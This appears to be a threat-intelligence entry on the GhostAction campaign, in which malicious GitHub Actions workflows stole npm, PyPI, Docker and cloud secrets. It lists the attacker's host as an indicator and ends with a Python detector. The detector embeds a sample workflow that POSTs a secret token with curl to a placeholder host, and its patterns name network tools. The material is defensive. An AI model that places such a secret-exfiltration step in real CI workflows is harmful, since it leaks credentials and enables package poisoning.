
Made with 💙 by Wiz

Last Updated: April 3, 2025

GhostAction campaign

Type: Campaign
Actors: Unknown
Pub. date: September 5, 2025
Initial access: Cloud native misconfig
Impact: Data exfiltration
Observed techniques: Misconfigured GitHub Action abuse, Credential theft, Credential harvesting from code repository
Targeted technologies: npm, PyPI, Docker, GitHub
References: https://blog.gitguardian.com/ghostaction-campaign-3-325-secrets-stolen/
Status: Finalized
Last edited: Sep 30, 2025 1:16 PM

On September 5, 2025, GitGuardian reported a campaign titled "GhostAction": attackers who had obtained write access to GitHub repositories through an unknown initial-access vector added a malicious GitHub Actions workflow that exfiltrates CI/CD secrets via HTTP POST to an attacker-controlled endpoint. The campaign has reportedly affected 327 users, 817 repositories, and 3,325 secrets (including npm, PyPI, Docker Hub, and GitHub tokens, as well as cloud keys). The workflow, typically named "Github Actions Security", triggered on push and workflow_dispatch and sent the secrets to bold-dhawan.45-139-104-115.plesk[.]page (seen resolving to 45.139.104[.]115 during the window).

The malicious workflow can read any repository, organization, or environment secrets it references and exfiltrate them. With stolen registry tokens, attackers can publish trojaned packages or images under legitimate namespaces, poisoning downstream consumers. If static cloud credentials were present in CI, they can pivot into cloud tenants to access or modify data, tamper with workloads, escalate IAM privileges, and persist, potentially degrading security visibility until the keys are rotated. On self-hosted runners, an outbound HTTP POST succeeds immediately unless egress is restricted. The blast radius spans both source and runtime estates and persists until the workflow is removed, exposed secrets are rotated, artifacts are audited, and CI shifts to short-lived OIDC access.
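A repository-side check for the workflow pattern described above, written as an added example (not from the GitGuardian report or Wiz): it flags a workflow whose name matches the reported one, whose triggers are the broad push/workflow_dispatch pair, whose run steps interpolate `${{ secrets.* }}` into a network client, or which calls out to the cited indicator host or a raw IP. Both sample workflows are constructed, the suspicious one's destination host is a placeholder, and the regex-based YAML handling is a heuristic rather than a full parser.

```python
import re

# Constructed sample mirroring the report: a "Github Actions Security" workflow on
# push/workflow_dispatch that feeds a secret to an outbound HTTP client (placeholder host).
SUSPICIOUS_WORKFLOW = """\
name: Github Actions Security
on: [push, workflow_dispatch]
jobs:
  audit:
    steps:
      - run: curl -s -X POST -d "t=${{ secrets.NPM_TOKEN }}" https://collector.example.invalid/
"""
# Constructed benign counterpart: release-triggered OIDC trusted publishing, no stored token.
BENIGN_WORKFLOW = """\
name: Publish
on:
  release:
    types: [published]
permissions:
  id-token: write
jobs:
  publish:
    steps:
      - uses: pypa/gh-action-pypi-publish@release/v1
"""

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}")
NET_TOOL = re.compile(r"\b(curl|wget|Invoke-WebRequest|nc)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")
# Indicator quoted in the GitGuardian report referenced above, refanged for matching.
KNOWN_IOC_HOSTS = {"bold-dhawan.45-139-104-115.plesk.page"}

def analyze_workflow(text: str) -> list[str]:
    """Return findings for one workflow file; an empty list means nothing was flagged."""
    findings = []
    if re.search(r"^name:\s*Github Actions Security\s*$", text, re.M):
        findings.append("workflow name matches the campaign's reported name")
    # Triggers appear either nested ("  push:") or inline ("on: [push, workflow_dispatch]").
    triggers = set(re.findall(r"^\s+(push|workflow_dispatch):", text, re.M))
    inline = re.search(r"^on:[ \t]*(\S.*)$", text, re.M)
    if inline:
        triggers.update(re.findall(r"\b(push|workflow_dispatch)\b", inline.group(1)))
    if triggers:
        findings.append("broad trigger(s): " + ", ".join(sorted(triggers)))
    for n, line in enumerate(text.splitlines(), 1):
        if SECRET_REF.search(line) and NET_TOOL.search(line):
            findings.append(f"line {n}: secret interpolated into a network command")
        for host in URL_HOST.findall(line):
            if host in KNOWN_IOC_HOSTS or re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
                findings.append(f"line {n}: outbound call to known IOC or raw IP {host}")
    return findings
```

Run it over every file under `.github/workflows/` in a pre-merge check or a periodic audit; the benign sample returns no findings because trusted publishing needs no long-lived token in the repository.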